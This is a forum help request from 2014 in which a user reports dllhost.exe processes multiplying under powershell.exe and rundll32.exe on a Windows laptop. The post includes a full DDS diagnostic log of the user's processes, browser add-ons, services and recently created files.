Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple dllhost.exe parented by powershell.exe from rundll32.exe


  • This topic is locked This topic is locked
8 replies to this topic

#1 firzenj

firzenj

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:34 AM

Posted 15 September 2014 - 01:31 PM

Hello,

 

I'm having the same issue as discussed about in

http://www.bleepingcomputer.com/forums/t/541595/multiple-dllhostexecom-surrogate-processes-running/

And here is what I found:

 

I manage to find track the route(by process explorer):

svchost.exe -k DcomLaunch >>>rundll32.exe>>>>powershell.exe

then dllhost.exe,

 

as observed, a few time after the first dllhost.exe showed up,  it duplicated itself and create the second one which duplicate very fast to a dozen, So I killed the process tree of the second and suspended the first one(not to kill), then it seemed been halted from duplication, but the rundll32.exe and powershell.exe still are showing up until now, after a lot of scanning and removing malwares(malwarebytes says there are no threat)````

Also I found rundll32.exe and powershell.exe will be triggered once I open the explorer.exe, I'm not sure what else will trigger it. then these two will be repeatedly showing up and then disappear very fast, and cease to appear after a long time after I close all explorer windows and remain doing nothing. 

 

I apologize for my take-as-granted actions and my nonprofessional talk above, but I hope those can assist your mighty smart guys to fight virus or trojan, and the save my computer.....

 

 

As I said, I suspend One dllhost.exe,

Also I manually disabled the "AV: 360杀毒" and "SP: IObit Malware Fighter", since Avira is already taking up 50% of CPU usage.

 

 

 

DDS (Ver_2012-11-20.01) - NTFS_x86 
Internet Explorer: 9.0.8112.16563
Run by THINK at 13:36:41 on 2014-09-15
AV: Avira Desktop *Enabled/Updated* {4D041356-F94D-285F-8768-AAE50FA36859}
AV: 360杀毒 *Disabled/Updated* {6F7A6B22-2309-7CD0-AF79-D11A4916C60C}
SP: Avira Desktop *Enabled/Updated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: IObit Malware Fighter *Disabled/Updated* {A751AC20-3B48-5237-898A-78C4436BB78D}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\windows\system32\lsm.exe
C:\windows\system32\ibmpmsvc.exe
C:\windows\system32\atiesrxx.exe
C:\windows\system32\SLsvc.exe
C:\windows\system32\atieclxx.exe
q:\Program Files\Keniu\ConewRsc\conewrsc.exe
C:\windows\system32\WLANExt.exe
C:\windows\System32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
C:\windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
C:\Program Files\OO Software\Defrag\oodag.exe
C:\PROGRA~1\PHAROS~1\Core\CTskMstr.exe
C:\Program Files\ThinkPad\Utilities\PWMDBSVC.EXE
C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe
C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe
C:\windows\system32\SearchIndexer.exe
C:\windows\system32\DRIVERS\xaudio.exe
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\windows\System32\WUDFHost.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\Dwm.exe
C:\windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
C:\Windows\system32\igfxsrvc.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
C:\windows\system32\conime.exe
c:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe
C:\Users\THINK\Desktop\procexp_V15.40.0.0.4202571463.exe
C:\windows\System32\mobsync.exe
Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\Components\AddressSearch\1.0.0.1255\SGImeGuard.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\windows\system32\dllhost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\7.2.0.2991\SogouCloud.exe
C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\windows\system32\SearchProtocolHost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\7.2.0.2991\SGTool.exe
C:\windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiPrvSE.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k rpcss
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k GPSvcGroup
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\windows\system32\svchost.exe -k bthsvcs
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\windows\system32\svchost.exe -k imgsvc
C:\windows\system32\svchost.exe -k iissvcs
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.hao123.com/?tn=91192494_hao_pg
uDefault_Page_URL = hxxp://www.hao123.com/?tn=91192494_hao_pg
mStart Page = about:blank
uProxyOverride = local
BHO: QQDownload IE Left Helper: {00000000-12C9-4305-82F9-43058F20E8D2} - q:\program files\tencent\qqdownload\QQIEHelper01.dll
BHO: IE2EMBHO Class: {0A0DDBD3-6641-40B9-873F-BBDD26D6C14E} - q:\program files\easymule\modules\IE2EM.dll
BHO: 360sdbho Class: {0F4BF955-A127-41B7-A998-369904AA2578} - q:\program files\360\360sd\360sdbho.dll
BHO: ExplorerWnd Helper: {10921475-03CE-4E04-90CE-E2E7EF20C814} - q:\program files\iobit\iobit uninstaller\UninstallExplorer32.dll
BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - c:\program files\microsoft\bingbar\7.2.241.0\BingExt.dll
BHO: WebDetectorBHO Class: {43BEAFD9-E005-483D-A367-146BA6C8A32E} - q:\program files\tudou\飞速tudou\tudouDetector.dll
BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - <orphaned>
BHO: xiamistart Class: {658D2C4F-158A-46FB-8C96-B1C8F56DBBE9} - h:\shark\XiaMiplugin.dll
BHO: BOC ProcessProtect Class: {776B71E2-B4CC-4C94-BC7C-09103AA690B6} - c:\windows\system32\ProcessProtection.dll
BHO: 迅雷下载支持: {889D2FEB-5411-4565-8998-1DD2C5261283} - q:\program files\thunder network\thunder\bho\XunleiBHO7.99.9.172.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - <orphaned>
BHO: Advanced SystemCare Browser Protection: {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} - c:\program files\iobit\surfing protection\browerprotect\ASCPlugin_Protection.dll
BHO: AccountProtectBHO Class: {DDD362CF-523B-4BC9-8FDC-58F93B6BC945} - c:\users\think\appdata\roaming\tencent\qq\qqantiphishing\AccountProtect.dll
BHO: 迅雷下载支持组件: {DE05CF4A-7B0A-4775-B5E5-396244938679} - q:\program files\thunder network\thunder\thunder bho platform\np_tdieplat.dll
BHO: BHOImpl Class: {E1499FE7-129D-4B6E-B681-DDF21E14172C} - c:\users\think\documents\itools\plugin\iToolsBHO.dll
TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - c:\program files\microsoft\bingbar\7.2.241.0\BingExt.dll
uRun: [Adobe Acrobat Synchronizer] "q:\program files\adobe.acrobat.x.pro\acrobat\AdobeCollabSync.exe"
uRun: [360sd] "q:\program files\360\360sd\360sdrun.exe"
uRun: [HP Officejet Pro 8600 (NET)] "c:\program files\hp\hp officejet pro 8600\bin\ScanToPCActivationApp.exe" -deviceID "CN346BWGWV05KC:NW" -scfn "HP Officejet Pro 8600 (NET)" -AutoStart 1
uRun: [ctfmon] c:\windows\system32\ctfmon.exe
mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min
StartupFolder: c:\users\think\appdata\roaming\micros~1\windows\startm~1\programs\startup\监视墨~2.lnk - c:\windows\system32\RunDll32.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\blueto~1.lnk - c:\program files\thinkpad\bluetooth software\BTTray.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\stk02n~1.lnk - c:\windows\stk02n\STK02NM.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:255
uPolicies-Explorer: AlwaysShowClassicMenu = dword:0
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-Explorer: EnableShellExecuteHooks = dword:1
mPolicies-Explorer: OldEnableShellExecuteHooks = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:255
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: DisableCAD = dword:1
IE: &U使用米人下载并收藏 - q:\program files\namirobot\data\du.html
IE: &使用&迅雷下载 - q:\program files\thunder network\thunder\bho\\GetUrl.htm
IE: &使用&迅雷下载全部链接 - q:\program files\thunder network\thunder\bho\\GetAllUrl.htm
IE: &使用&迅雷离线下载 - q:\program files\thunder network\thunder\bho\OfflineDownload.htm
IE: &使用115优蛋下载 - q:\program files\115\udown\getUrl.htm
IE: &使用115优蛋下载全部链接 - q:\program files\115\udown\getAllUrl.htm
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: 使用旋风下载(&X) - q:\program files\tencent\qqdownload\xfgeturl.htm
IE: 使用旋风下载全部链接(&Q) - q:\program files\tencent\qqdownload\xfgetAllurl.htm
IE: 使用旋风极速下载(会员特权)(&J) - q:\program files\tencent\qqdownload\xftopspeed.htm
IE: 使用电驴下载 - q:\program files\easymule\IE2EM.htm
IE: 保存到旋风空间(会员特权)(&K) - q:\program files\tencent\qqdownload\xfofflineonly.htm
IE: 图像发送到 Bluetooth 设备(&B)... - c:\program files\thinkpad\bluetooth software\btsendto_ie_ctx.htm
IE: 导出到 Microsoft Excel(&X) - c:\progra~1\micros~2\office12\EXCEL.EXE/3000
IE: 导出到 Microsoft Office Excel(&X) - c:\progra~1\micros~2\office11\EXCEL.EXE/3000
IE: 页面发送到 Bluetooth 设备(&B)... - c:\program files\thinkpad\bluetooth software\btsendto_ie.htm
IE: {22CC3EBD-C286-43aa-B8E6-06B115F74162} - c:\program files\hewlett-packard\smart print 2.0\smartprintsetup.exe
IE: {24c1d00e-0b92-4379-880b-444fa2d740dd} - c:\users\public\thunder network\xmp4\core\program\XmpIEToolBar.htm
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {95B3F550-91C4-4627-BCC4-521288C52977} - c:\program files\pplive\pptv\PPLive.exe
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - c:\program files\thinkpad\bluetooth software\btsendto_ie.htm
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
Trusted Zone: alipay.com
Trusted Zone: alipay.com
Trusted Zone: alisoft.com
Trusted Zone: alisoft.com
Trusted Zone: taobao.com
Trusted Zone: taobao.com
DPF: HighSpeedDownloadIE - hxxp://st2.dbank.com/netdisk/plugin/1011/DBank_downloadplugin.CAB
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} - hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {2B24B8F5-8FAD-4933-8E6C-3CAAEEA4D217} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
DPF: {45D2E7C0-B894-43CE-B64E-F210DBEC8C94} - hxxp://www.activextest.com/activex/ActiveXScanner.CAB
DPF: {816BE035-1450-40D0-8A3B-BA7825A83A77} - hxxp://support.lenovo.com/Resources/Lenovo/AutoDetect/Lenovo_AutoDetect2.cab
DPF: {9732FB42-C321-11D1-836F-00A0C993F125} - hxxp://mheller.com/mhLbl.cab
DPF: {9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86} - hxxp://think.lenovo.com.cn/ThinkEDriver/cab/npdueng.cab
DPF: {BBF51028-5890-4817-A2C4-5F3CFCEBD7EF} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
TCP: NameServer = 167.206.112.138 167.206.7.4 167.206.3.168
TCP: Interfaces\{02A11E56-F72B-4333-B0A5-58A7A6EFC4DB} : DHCPNameServer = 167.206.112.138 167.206.7.4 167.206.3.168
TCP: Interfaces\{32801F40-76EE-480A-9361-DFBC38914F1B} : DHCPNameServer = 129.49.7.170
Handler: KuGoo - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\program files\kugou7\KuGoo3DownXControl.ocx
Handler: KuGoo3 - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\program files\kugou7\KuGoo3DownXControl.ocx
Handler: ms-itss - <Clsid value has no data>
Handler: sacore - <Clsid value has no data>
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\wpdshserviceobj.dll
LSA: Notification Packages =  scecli ACGina
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "c:\program files\common files\lightscribe\LSRunOnce.exe"
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R0 BC;BC;c:\windows\system32\drivers\bc.sys [2014-7-20 24472]
R0 TPDIGIMN;TPDIGIMN;c:\windows\system32\drivers\ApsHM86.sys [2011-3-29 20592]
R1 avkmgr;avkmgr;c:\windows\system32\drivers\avkmgr.sys [2012-12-15 37352]
R1 BAPIDRV;BAPIDRV;c:\windows\system32\drivers\BAPIDRV.SYS [2014-7-20 165960]
R1 DVDHelp;DVD Video Region CSS free Filter Driver;c:\windows\system32\drivers\DVDHelp.sys [2011-2-4 25624]
R1 lenovo.smi;Lenovo System Interface Driver;c:\windows\system32\drivers\smiif32.sys [2008-5-19 13480]
R1 ProtectorA;ProtectorA;c:\windows\system32\drivers\ProtectorA.sys [2011-1-1 15240]
R1 QQProtect;QQProtect;c:\windows\system32\drivers\QQProtect.sys [2013-8-7 215096]
R1 Su1xDriver;Su1xDriver;c:\windows\system32\drivers\Su1xDriver.sys [2011-3-7 6144]
R2 {1BA31E5A-C098-42d8-8F88-3C9F78A2FDDC};Power Control [2011/04/29 19:35:49];q:\program files\cyberlink\powerdvd10\powerdvd10\navfilter\000.fcl [2010-3-13 87536]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2010-5-5 172032]
R2 AntiVirSchedulerService;Avira Scheduler;c:\program files\avira\antivir desktop\sched.exe [2012-12-15 430160]
R2 AntiVirService;Avira Real-Time Protection;c:\program files\avira\antivir desktop\avguard.exe [2012-12-15 430160]
R2 AntiVirWebService;Avira Web Protection;c:\program files\avira\antivir desktop\avwebgrd.exe [2012-12-15 1021008]
R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2012-12-15 97648]
R2 Conew Rescue Service;Conew Rescue Service;q:\program files\keniu\conewrsc\conewrsc.exe [2014-9-13 140696]
R2 YLMFVDISK;YLMF Virtual Diskette V1;c:\windows\system32\drivers\VirtDisk.sys [2012-3-15 23768]
R3 360AvFlt;360AvFlt mini-filter driver;c:\windows\system32\drivers\360AvFlt.sys [2014-7-20 65608]
R3 e1yexpress;Intel® Gigabit Network Connections Driver;c:\windows\system32\drivers\e1y6032.sys [2009-9-10 224384]
R3 intelkmd;intelkmd;c:\windows\system32\drivers\igdpmd32.sys [2009-12-10 4747776]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-7-11 23256]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-9-14 110296]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys [2014-9-14 51928]
R3 NdisrdMP;NdisrdMP;c:\windows\system32\drivers\Ndisrd.sys [2011-4-30 22016]
R3 NETwNv32;___ Intel® Wireless WiFi Link 5000 系列适配器驱动程序(适用于 Windows Vista 32 位);c:\windows\system32\drivers\NETwNv32.sys [2011-8-3 7341568]
R3 rasuw;ChinaNet WLAN Adapter;c:\windows\system32\drivers\rasuw.sys [2010-2-4 33280]
R3 RegFilter;RegFilter;c:\program files\iobit\iobit malware fighter\drivers\wlh_x86\RegFilter.sys [2014-9-14 32288]
R3 TVTI2C;Lenovo SM bus driver;c:\windows\system32\drivers\tvti2c.sys [2008-2-22 37312]
S2 360rp;360 杀毒实时防护加载服务;q:\program files\360\360sd\360rps.exe [2014-7-20 251208]
S2 AntiVirMailService;Avira Mail Protection;c:\program files\avira\antivir desktop\avmailc.exe [2012-12-15 802384]
S2 dtsvc;Data Transfer Service;c:\windows\system32\DTS.exe [2009-3-18 98304]
S3 AdvancedSystemCareService7;Advanced SystemCare Service 7;q:\program files\iobit\advanced systemcare 7\ASCService.exe [2014-7-21 881952]
S3 Alidevice;Alidevice;c:\windows\system32\drivers\alidevice.sys [2010-7-1 6656]
S3 ATSwpWDF;AuthenTec TruePrint USB WDF Driver;c:\windows\system32\drivers\ATSwpWDF.sys [2009-3-19 482176]
S3 bthav;Bluetooth AV 配置文件;c:\windows\system32\drivers\bthav.sys [2008-7-10 34816]
S3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys [2012-2-26 45736]
S3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\drivers\btwl2cap.sys [2012-2-26 29472]
S3 krpr;krpr;c:\windows\system32\drivers\krpr.sys [2014-9-13 48536]
S3 ksaud;Creative USB Audio Driver;c:\windows\system32\drivers\ksaud.sys [2011-8-24 1230976]
S3 Ndisrd;WinpkFilter Service;c:\windows\system32\drivers\Ndisrd.sys [2011-4-30 22016]
S3 nmwcdnsu;Nokia USB Flashing Phone Parent;c:\windows\system32\drivers\nmwcdnsu.sys [2009-10-5 136704]
S3 nmwcdnsuc;Nokia USB Flashing Generic;c:\windows\system32\drivers\nmwcdnsuc.sys [2009-10-5 8320]
S3 p2pfilter;p2pfilter;q:\program files\p2pover\p2pfilter.sys [2005-5-10 4524]
S3 Tq_91Assistant;Tq_91Assistant;q:\program files\netdragon\91 mobile\iphone\Tq_91Assistant.sys [2011-8-7 15784]
S3 UrlFilter;UrlFilter;c:\program files\iobit\iobit malware fighter\drivers\wlh_x86\UrlFilter.sys [2014-9-14 20944]
S4 ADMonitor;AD Monitor;c:\windows\system32\ADMonitor.exe [2009-3-18 106496]
S4 ATService;AuthenTec Fingerprint Service;c:\windows\system32\AtService.exe [2009-3-18 1680632]
S4 DGPNPSEV;DriverGenius PNP Service;q:\program files\mydrivers\drivergenius2012\DgService.exe [2012-8-16 52664]
S4 FileMonitor;FileMonitor;c:\program files\iobit\iobit malware fighter\drivers\wlh_x86\FileMonitor.sys [2014-9-14 21480]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=c:\windows\notepad.exe %1
.
=============== Created Last 30 ================
.
2014-09-15 04:29:21 -------- d-----w- c:\program files\ESET
2014-09-15 03:27:36 -------- d-----w- c:\users\think\appdata\local\Avg2015
2014-09-15 03:27:10 -------- d--h--w- c:\programdata\Common Files
2014-09-15 03:27:10 -------- d-----w- c:\users\think\appdata\local\MFAData
2014-09-15 03:27:10 -------- d-----w- c:\users\think\appdata\local\Avg2014
2014-09-15 03:27:10 -------- d-----w- c:\programdata\MFAData
2014-09-14 21:20:05 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-14 21:19:14 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-14 21:19:14 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-14 21:19:14 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-14 20:21:04 -------- d-sh--w- C:\$RECYCLE.BIN
2014-09-14 16:59:51 98816 ----a-w- c:\windows\sed.exe
2014-09-14 16:59:51 256000 ----a-w- c:\windows\PEV.exe
2014-09-14 16:59:51 208896 ----a-w- c:\windows\MBR.exe
2014-09-14 16:49:58 -------- d-----w- C:\FRST
2014-09-14 05:20:13 -------- d-----w- c:\programdata\ksrbm
2014-09-14 03:58:26 48536 ----a-w- c:\windows\system32\drivers\krpr.sys
2014-09-12 23:10:13 -------- d-sh--w- c:\users\think\appdata\roaming\360Quarant
2014-09-12 23:05:18 358984 ----a-w- c:\windows\system32\drivers\Kemon.sys
2014-09-11 03:44:39 0 ----a-w- c:\windows\system32\nsyF3B8.tmp
2014-09-10 06:04:08 -------- d-----w- c:\users\think\appdata\roaming\Foxit Software
2014-09-08 18:32:31 -------- d-----w- c:\programdata\LocalStorage
2014-09-08 18:29:16 -------- d-----w- c:\users\think\appdata\roaming\IQIYI Video
2014-09-06 23:55:47 -------- d-----w- c:\users\think\appdata\local\thunder network
2014-08-27 01:49:33 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-27 01:48:56 638400 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-27 01:48:56 37376 ----a-w- c:\windows\system32\cdd.dll
2014-08-27 01:48:29 82432 ----a-w- c:\windows\system32\consent.exe
2014-08-27 01:48:29 332800 ----a-w- c:\windows\system32\msihnd.dll
2014-08-27 01:48:29 33280 ----a-w- c:\windows\system32\appinfo.dll
2014-08-27 01:48:29 2263552 ----a-w- c:\windows\system32\msi.dll
2014-08-27 01:48:29 1993728 ----a-w- c:\windows\system32\authui.dll
2014-08-27 01:43:59 768512 ----a-w- c:\program files\common files\microsoft shared\vgx\VGX.dll
2014-08-27 01:42:53 1305088 ----a-w- c:\program files\common files\microsoft shared\ink\tipskins.dll
2014-08-27 01:42:52 2051072 ----a-w- c:\windows\system32\win32k.sys
2014-08-27 01:42:52 149504 ----a-w- c:\program files\common files\microsoft shared\ink\tabskb.dll
2014-08-27 01:42:52 114688 ----a-w- c:\program files\common files\microsoft shared\ink\TipBand.dll
2014-08-27 01:42:36 983552 ----a-w- c:\program files\windows journal\JNTFiltr.dll
2014-08-27 01:42:36 965120 ----a-w- c:\program files\windows journal\JNWDRV.dll
2014-08-27 01:42:36 1218048 ----a-w- c:\program files\windows journal\NBDoc.DLL
2014-08-27 01:42:35 937472 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
2014-08-27 01:42:15 506880 ----a-w- c:\windows\system32\qedit.dll
2014-08-27 01:42:03 1401344 ----a-w- c:\windows\system32\msxml6.dll
2014-08-27 01:42:03 1248768 ----a-w- c:\windows\system32\msxml3.dll
2014-08-27 01:41:50 502784 ----a-w- c:\windows\system32\usp10.dll
2014-08-27 01:41:36 915392 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-08-27 01:41:36 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2014-08-27 01:40:19 876032 ----a-w- c:\windows\system32\wer.dll
2014-08-24 14:48:03 -------- d-----w- C:\$360Section
2014-08-19 05:50:16 3695208 ----a-w- c:\windows\system32\SogouPY.ime
.
==================== Find3M  ====================
.
2014-09-12 22:56:54 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-12 22:56:54 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-08-27 01:44:03 1129472 ----a-w- c:\windows\system32\wininet.dll
2014-08-27 01:44:01 11776 ----a-w- c:\windows\system32\mshta.exe
2014-08-27 01:44:00 2382848 ----a-w- c:\windows\system32\mshtml.tlb
2014-08-27 01:43:59 1810432 ----a-w- c:\windows\system32\jscript9.dll
2014-08-27 01:43:59 142848 ----a-w- c:\windows\system32\ieUnatt.exe
2014-08-27 01:43:59 1427968 ----a-w- c:\windows\system32\inetcpl.cpl
2014-08-27 01:43:58 421376 ----a-w- c:\windows\system32\vbscript.dll
2014-08-27 01:43:09 273408 ----a-w- c:\windows\system32\drivers\afd.sys
2014-07-22 03:01:27 335360 ----a-w- c:\windows\system32\SysFxUI.dll
2014-07-22 03:01:27 167936 ----a-w- c:\windows\system32\drivers\portcls.sys
2014-07-22 03:01:27 1304064 ----a-w- c:\windows\system32\WMALFXGFXDSP.dll
2014-07-22 03:01:27 130048 ----a-w- c:\windows\system32\drivers\drmk.sys
2014-07-22 03:01:14 158208 ----a-w- c:\windows\system32\imagehlp.dll
2014-07-22 03:01:03 36864 ----a-w- c:\windows\system32\wshcon.dll
2014-07-22 03:01:03 172032 ----a-w- c:\windows\system32\scrrun.dll
2014-07-22 03:01:03 155648 ----a-w- c:\windows\system32\wscript.exe
2014-07-22 03:01:03 135168 ----a-w- c:\windows\system32\cscript.exe
2014-07-22 03:01:03 131072 ----a-w- c:\windows\system32\wshom.ocx
2014-07-22 03:00:52 596480 ----a-w- c:\windows\system32\FWPUCLNT.DLL
2014-07-22 03:00:51 444928 ----a-w- c:\windows\system32\IKEEXT.DLL
2014-07-22 03:00:33 993792 ----a-w- c:\windows\system32\crypt32.dll
2014-07-22 03:00:12 297984 ----a-w- c:\windows\system32\gdi32.dll
2014-07-22 02:59:48 24576 ----a-w- c:\windows\system32\cryptdlg.dll
2014-07-22 02:59:05 102608 ----a-w- c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-07-22 02:58:55 25472 ----a-w- c:\windows\system32\drivers\hidparse.sys
2014-07-22 02:58:45 8704 ----a-w- c:\windows\system32\hccoin.dll
2014-07-22 02:58:45 73216 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-07-22 02:58:45 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-07-22 02:58:45 39936 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-07-22 02:58:45 23552 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-07-22 02:58:45 226304 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-07-22 02:58:45 197632 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-07-22 02:58:45 15872 ----a-w- c:\windows\system32\hcrstco.dll
2014-07-22 02:58:03 532480 ----a-w- c:\windows\system32\comctl32.dll
2014-07-22 02:56:45 49152 ----a-w- c:\windows\system32\csrsrv.dll
2014-07-22 02:56:45 1205168 ----a-w- c:\windows\system32\ntdll.dll
2014-07-22 02:56:44 64000 ----a-w- c:\windows\system32\smss.exe
2014-07-22 02:56:44 3603904 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-07-22 02:56:44 3551680 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-07-22 02:56:30 24064 ----a-w- c:\windows\system32\drivers\tssecsrv.sys
2014-07-22 02:56:30 15872 ----a-w- c:\windows\system32\icaapi.dll
2014-07-22 02:56:02 783360 ----a-w- c:\windows\system32\rpcrt4.dll
2014-07-22 02:55:48 98304 ----a-w- c:\windows\system32\cryptnet.dll
2014-07-22 02:55:48 172544 ----a-w- c:\windows\system32\wintrust.dll
2014-07-22 02:55:47 133120 ----a-w- c:\windows\system32\cryptsvc.dll
2014-07-22 02:54:13 812544 ----a-w- c:\windows\system32\certutil.exe
2014-07-22 02:54:13 41984 ----a-w- c:\windows\system32\certenc.dll
2014-07-22 02:53:47 443904 ----a-w- c:\windows\system32\win32spl.dll
2014-07-22 02:53:47 37376 ----a-w- c:\windows\system32\printcom.dll
2014-07-22 02:53:39 1082232 ----a-w- c:\windows\system32\drivers\ntfs.sys
2014-07-22 02:53:28 36864 ----a-w- c:\windows\system32\tsgqec.dll
2014-07-22 02:53:28 2691072 ----a-w- c:\windows\system32\mstscax.dll
2014-07-22 02:53:28 131072 ----a-w- c:\windows\system32\aaclient.dll
2014-07-22 02:53:07 376320 ----a-w- c:\windows\system32\winsrv.dll
